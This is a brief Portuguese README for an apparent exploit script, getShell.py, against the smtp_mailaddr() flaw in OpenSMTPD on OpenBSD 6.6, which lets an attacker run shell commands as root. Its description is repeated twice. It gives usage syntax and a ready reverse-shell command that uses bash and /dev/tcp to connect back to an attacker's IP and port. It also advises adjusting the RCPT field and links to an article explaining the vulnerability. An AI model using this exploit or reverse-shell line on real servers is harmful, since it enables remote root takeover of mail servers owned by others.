
Esta vulnerabilidade existe na função “smtp_mailaddr()” do servidor de e-mail OpenSMTPD do OpenBSD e afeta a versão 6.6 do OpenBSD. Isso permite que um invasor execute comandos shell arbitrários, como “sleep 66”, como usuário root.
Esta vulnerabilidade existe na função "smtp_mailaddr()" do servidor de e-mail OpenSMTPD do OpenBSD e afeta a versão 6.6 do OpenBSD. Isso permite que um invasor execute comandos shell arbitrários como "sleep 66" como usuário root
python3 getShell.py <ipAlvo> <portaAlvo> <comando>
Se precisar de um reverse shell, execute assim
python3 getShell.py <ipAlvo> <portaAlvo> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
Altere algumas coisas neste exploit, como RCPT para e algo (se necessário)
Veja este artigo para uma explicação mais clara
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/